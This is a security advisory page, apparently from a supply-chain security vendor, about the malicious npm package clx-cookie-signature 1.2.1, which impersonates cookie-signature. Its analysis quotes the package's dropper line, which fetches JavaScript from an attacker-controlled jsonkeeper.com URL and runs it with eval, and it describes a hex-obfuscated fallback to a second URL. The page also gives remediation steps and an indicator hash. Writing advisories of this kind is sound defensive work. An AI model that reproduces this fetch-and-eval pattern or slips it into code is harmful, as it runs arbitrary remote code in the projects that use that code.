Which versions of clx-cookie-signature are malicious?

The following npm versions of clx-cookie-signature are flagged malicious: 1.2.1. Treat any of these as compromised.

How do I remediate clx-cookie-signature if I installed it?

Remove clx-cookie-signature from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is clx-cookie-signature part of a known attack campaign?

Yes — clx-cookie-signature is associated with the IN-MAL-2026-007036 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect clx-cookie-signature in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking clx-cookie-signature and packages like it before any post-install script runs.

Malicious package

clx-cookie-signaturenpm

Malicious code in clx-cookie-signature (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6141

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall clx-cookie-signature

What this malware does

Package impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk [email protected]', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), eval'ing whatever JSON the author currently hosts at that URL. A helper g() (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.

Malicious versions

1 flagged

1.2.1

Indicators of compromise (SHA-256)

9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3

Frequently asked questions

No. clx-cookie-signature on npm has been identified as a malicious package (version 1.2.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007036

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection